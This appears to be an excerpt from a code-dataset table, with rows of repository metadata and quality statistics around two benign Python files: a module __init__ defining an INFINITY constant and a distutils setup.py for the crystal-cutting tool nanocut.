Profile.reimport_stripe_history(limit, days, starting_after) | 42 | 140 | 0.68254 | 119 | 882 | 4.97479 | 0.529412 | 0.045608 | 0.086149 | 0.043919 | 0.067568 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012295 | 0.170068 | 882 | 21 | 141 | 42 | 0.796448 | 0 | 0 | 0 | 0 | 0 | 0.161948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.4 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
fe0cbd28f8c6fb1e81384c0bff59a3911acf954b | 51 | py | Python | model/infrastructure/__init__.py | e-kolpakov/study-model | e10dd9f0d876c8d434fef99c5ffea80b385ec9ed | [
"MIT"
] | 2 | 2019-04-25T04:59:02.000Z | 2019-05-09T06:14:04.000Z | model/infrastructure/__init__.py | e-kolpakov/study-model | e10dd9f0d876c8d434fef99c5ffea80b385ec9ed | [
"MIT"
] | null | null | null | model/infrastructure/__init__.py | e-kolpakov/study-model | e10dd9f0d876c8d434fef99c5ffea80b385ec9ed | [
"MIT"
] | null | null | null | __author__ = 'e.kolpakov'
INFINITY = float('Inf')
| 12.75 | 25 | 0.686275 | 6 | 51 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 51 | 3 | 26 | 17 | 0.704545 | 0 | 0 | 0 | 0 | 0 | 0.254902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fe0d79f459c5738c3c8cc8818ec8a31e36f0d438 | 1,209 | py | Python | setup.py | tamaswells/Nanocut_redistribute | 3103eaa3c015ab1c04fb254d51c263a00df90cae | [
"BSD-2-Clause"
] | 1 | 2020-05-12T23:52:02.000Z | 2020-05-12T23:52:02.000Z | setup.py | tamaswells/Nanocut_redistribute | 3103eaa3c015ab1c04fb254d51c263a00df90cae | [
"BSD-2-Clause"
] | null | null | null | setup.py | tamaswells/Nanocut_redistribute | 3103eaa3c015ab1c04fb254d51c263a00df90cae | [
"BSD-2-Clause"
] | 3 | 2019-02-27T07:03:07.000Z | 2021-04-27T14:44:22.000Z | #!/usr/bin/env python3.2
from distutils.core import setup
setup(name="nanocut",
version="12.12",
description="Cutting out various shapes from crystals",
author="Florian Uekermann, Sebastian Fiedler, Bálint Aradi",
author_email="baradi09@gmail.com",
url="http://bitbucket.org/aradi/nanocut",
license="BSD",
platforms="platform independent",
package_dir={ "": "src"},
packages=[ "nanocut", ],
scripts=[ "bin/nanocut" ],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 3.2",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering",
],
long_description="""
Cutting out various shapes from crystals
----------------------------------------
This tool provides you the possibility to cut out various forms from crystal
structures. You can create dots, wires, surfaces or any arbitrary periodic
or non-periodic structures, by specifying the crystal structure and the bounding
surfaces of the object to be cut out.
""")
| 36.636364 | 80 | 0.64268 | 133 | 1,209 | 5.819549 | 0.706767 | 0.03876 | 0.054264 | 0.072351 | 0.118863 | 0.118863 | 0.118863 | 0 | 0 | 0 | 0 | 0.010515 | 0.2134 | 1,209 | 32 | 81 | 37.78125 | 0.803365 | 0.019024 | 0 | 0 | 0 | 0 | 0.659916 | 0.052321 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.